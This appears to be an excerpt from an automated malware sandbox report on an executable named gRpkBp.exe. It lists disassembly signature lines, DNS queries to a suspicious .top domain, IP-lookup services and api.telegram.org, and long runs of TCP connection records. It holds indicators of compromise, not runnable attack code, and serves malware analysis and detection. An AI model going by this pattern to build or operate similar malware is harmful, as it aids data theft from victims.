Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Code function: 4x nop then jmp 020F37D2h		29_2_020F34D8
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Code function: 4x nop then jmp 020F1FEAh		29_2_020F1CF0
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Code function: 4x nop then jmp 020F0802h		29_2_020F0508
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Code function: 4x nop then jmp 020F2E42h		29_2_020F2B48
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Code function: 4x nop then jmp 020F165Ah		29_2_020F1360
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Code function: 4x nop then jmp 020F3C9Ah		29_2_020F39A0
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Code function: 4x nop then jmp 020F24B2h		29_2_020F21B8
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Code function: 4x nop then jmp 020F0CCAh		29_2_020F09D0
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Code function: 4x nop then jmp 0227C2C9h		29_2_0227C020
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Code function: 4x nop then jmp 02273BC9h		29_2_02273920
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Code function: 4x nop then jmp 0227CFD1h		29_2_0227CD28
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Code function: 4x nop then jmp 022748D1h		29_2_02274628
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Code function: 4x nop then jmp 022755D9h		29_2_02275330
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Code function: 4x nop then jmp 0227DCD9h		29_2_0227DA30
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Code function: 4x nop then jmp 022762E1h		29_2_02276038
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Code function: 4x nop then jmp 022792A9h		29_2_02279000
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Code function: 4x nop then jmp 0227F0E1h		29_2_0227EE10
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Code function: 4x nop then jmp 0227B5C1h		29_2_0227B318
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Code function: 4x nop then jmp 0227AD11h		29_2_0227AA68
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Code function: 4x nop then jmp 0227BA19h		29_2_0227B770
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Code function: 4x nop then jmp 02273319h		29_2_02273070
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Code function: 4x nop then jmp 02274021h		29_2_02273D78
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Code function: 4x nop then jmp 0227C721h		29_2_0227C478
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Code function: 4x nop then jmp 0227EC49h		29_2_0227E978
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Code function: 4x nop then jmp 0227FA11h		29_2_0227F740
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Code function: 4x nop then jmp 02276FE9h		29_2_02276D40
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Code function: 4x nop then jmp 02277CF1h		29_2_02277A48
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Code function: 4x nop then jmp 022789F9h		29_2_02278750
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Code function: 4x nop then jmp 02279701h		29_2_02279458
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Code function: 4x nop then jmp 02278149h		29_2_02277EA0
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Code function: 4x nop then jmp 0227F579h		29_2_0227F2A8
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Code function: 4x nop then jmp 02278E51h		29_2_02278BA8
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Code function: 4x nop then jmp 02279B59h		29_2_022798B0
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Code function: 4x nop then jmp 0227D429h		29_2_0227D180
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Code function: 4x nop then jmp 02274D29h		29_2_02274A80
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Code function: 4x nop then jmp 02275A31h		29_2_02275788
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Code function: 4x nop then jmp 0227E1C5h		29_2_0227DE88
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Code function: 4x nop then jmp 02276739h		29_2_02276490
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Code function: 4x nop then jmp 02277441h		29_2_02277198
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Code function: 4x nop then jmp 02275E89h		29_2_02275BE0
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Code function: 4x nop then jmp 0227E7B1h		29_2_0227E4E0
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Code function: 4x nop then jmp 02276B91h		29_2_022768E8
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Code function: 4x nop then jmp 02277899h		29_2_022775F0
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Code function: 4x nop then jmp 022785A1h		29_2_022782F8
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Code function: 4x nop then jmp 0227B169h		29_2_0227AEC0
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Code function: 4x nop then jmp 0227BE71h		29_2_0227BBC8
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Code function: 4x nop then jmp 02273771h		29_2_022734C8
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Code function: 4x nop then jmp 0227CB7Bh		29_2_0227C8D0
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Code function: 4x nop then jmp 02274479h		29_2_022741D0
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Code function: 4x nop then jmp 02275181h		29_2_02274ED8
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Code function: 4x nop then jmp 0227D881h		29_2_0227D5D8
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Code function: 4x nop then lea esp, dword ptr [ebp-04h]		29_2_022A5F28
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Code function: 4x nop then lea esp, dword ptr [ebp-04h]		29_2_022A5F38
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Code function: 4x nop then lea esp, dword ptr [ebp-04h]		29_2_022A2B00
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Code function: 4x nop then lea esp, dword ptr [ebp-04h]		29_2_022A2E16
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Code function: 4x nop then lea esp, dword ptr [ebp-04h]		29_2_022A2AA1

Source: global traffic	DNS query: name: meridianresourcellc.top
Source: global traffic	DNS query: name: meridianresourcellc.top
Source: global traffic	DNS query: name: meridianresourcellc.top
Source: global traffic	DNS query: name: meridianresourcellc.top
Source: global traffic	DNS query: name: meridianresourcellc.top
Source: global traffic	DNS query: name: meridianresourcellc.top
Source: global traffic	DNS query: name: meridianresourcellc.top
Source: global traffic	DNS query: name: meridianresourcellc.top
Source: global traffic	DNS query: name: meridianresourcellc.top
Source: global traffic	DNS query: name: meridianresourcellc.top
Source: global traffic	DNS query: name: meridianresourcellc.top
Source: global traffic	DNS query: name: meridianresourcellc.top
Source: global traffic	DNS query: name: meridianresourcellc.top
Source: global traffic	DNS query: name: meridianresourcellc.top
Source: global traffic	DNS query: name: meridianresourcellc.top
Source: global traffic	DNS query: name: checkip.dyndns.org
Source: global traffic	DNS query: name: checkip.dyndns.org
Source: global traffic	DNS query: name: reallyfreegeoip.org
Source: global traffic	DNS query: name: checkip.dyndns.org
Source: global traffic	DNS query: name: checkip.dyndns.org
Source: global traffic	DNS query: name: reallyfreegeoip.org
Source: global traffic	DNS query: name: checkip.dyndns.org
Source: global traffic	DNS query: name: checkip.dyndns.org
Source: global traffic	DNS query: name: checkip.dyndns.org
Source: global traffic	DNS query: name: checkip.dyndns.org
Source: global traffic	DNS query: name: reallyfreegeoip.org
Source: global traffic	DNS query: name: checkip.dyndns.org
Source: global traffic	DNS query: name: checkip.dyndns.org
Source: global traffic	DNS query: name: checkip.dyndns.org
Source: global traffic	DNS query: name: reallyfreegeoip.org
Source: global traffic	DNS query: name: checkip.dyndns.org
Source: global traffic	DNS query: name: checkip.dyndns.org
Source: global traffic	DNS query: name: checkip.dyndns.org
Source: global traffic	DNS query: name: reallyfreegeoip.org
Source: global traffic	DNS query: name: reallyfreegeoip.org
Source: global traffic	DNS query: name: reallyfreegeoip.org
Source: global traffic	DNS query: name: reallyfreegeoip.org
Source: global traffic	DNS query: name: checkip.dyndns.org
Source: global traffic	DNS query: name: checkip.dyndns.org
Source: global traffic	DNS query: name: checkip.dyndns.org
Source: global traffic	DNS query: name: checkip.dyndns.org
Source: global traffic	DNS query: name: reallyfreegeoip.org
Source: global traffic	DNS query: name: checkip.dyndns.org
Source: global traffic	DNS query: name: checkip.dyndns.org
Source: global traffic	DNS query: name: checkip.dyndns.org
Source: global traffic	DNS query: name: reallyfreegeoip.org
Source: global traffic	DNS query: name: reallyfreegeoip.org
Source: global traffic	DNS query: name: checkip.dyndns.org
Source: global traffic	DNS query: name: checkip.dyndns.org
Source: global traffic	DNS query: name: checkip.dyndns.org
Source: global traffic	DNS query: name: checkip.dyndns.org
Source: global traffic	DNS query: name: reallyfreegeoip.org
Source: global traffic	DNS query: name: reallyfreegeoip.org
Source: global traffic	DNS query: name: reallyfreegeoip.org
Source: global traffic	DNS query: name: api.telegram.org
Source: global traffic	DNS query: name: checkip.dyndns.org
Source: global traffic	DNS query: name: checkip.dyndns.org
Source: global traffic	DNS query: name: reallyfreegeoip.org
Source: global traffic	DNS query: name: checkip.dyndns.org
Source: global traffic	DNS query: name: checkip.dyndns.org
Source: global traffic	DNS query: name: reallyfreegeoip.org
Source: global traffic	DNS query: name: checkip.dyndns.org
Source: global traffic	DNS query: name: checkip.dyndns.org
Source: global traffic	DNS query: name: reallyfreegeoip.org
Source: global traffic	DNS query: name: checkip.dyndns.org
Source: global traffic	DNS query: name: checkip.dyndns.org
Source: global traffic	DNS query: name: reallyfreegeoip.org
Source: global traffic	DNS query: name: api.telegram.org

Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49175 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49178 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49181 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49183 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49186 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49188 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49189 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49192 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49193 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49194 -> 149.154.167.220:443
Source: global traffic	TCP traffic: 192.168.2.22:49196 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49198 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49200 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49202 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49203 -> 149.154.167.220:443
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 132.226.247.73:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 132.226.247.73:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 132.226.247.73:80
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 193.122.130.0:80
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 158.101.44.242:80
Source: global traffic	TCP traffic: 192.168.2.22:49177 -> 193.122.6.168:80
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 158.101.44.242:80
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 158.101.44.242:80
Source: global traffic	TCP traffic: 192.168.2.22:49177 -> 193.122.6.168:80
Source: global traffic	TCP traffic: 192.168.2.22:49180 -> 193.122.6.168:80
Source: global traffic	TCP traffic: 192.168.2.22:49182 -> 193.122.6.168:80
Source: global traffic	TCP traffic: 192.168.2.22:49184 -> 132.226.8.169:80
Source: global traffic	TCP traffic: 192.168.2.22:49185 -> 193.122.6.168:80
Source: global traffic	TCP traffic: 192.168.2.22:49187 -> 158.101.44.242:80
Source: global traffic	TCP traffic: 192.168.2.22:49190 -> 193.122.6.168:80
Source: global traffic	TCP traffic: 192.168.2.22:49191 -> 132.226.247.73:80
Source: global traffic	TCP traffic: 192.168.2.22:49195 -> 193.122.130.0:80
Source: global traffic	TCP traffic: 192.168.2.22:49197 -> 132.226.247.73:80
Source: global traffic	TCP traffic: 192.168.2.22:49199 -> 132.226.247.73:80
Source: global traffic	TCP traffic: 192.168.2.22:49201 -> 193.122.130.0:80
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 172.67.197.72:443
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 172.67.197.72:443
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 172.67.197.72:443
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 172.67.197.72:443
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 172.67.197.72:443
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 172.67.197.72:443
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 172.67.197.72:443
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 172.67.197.72:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
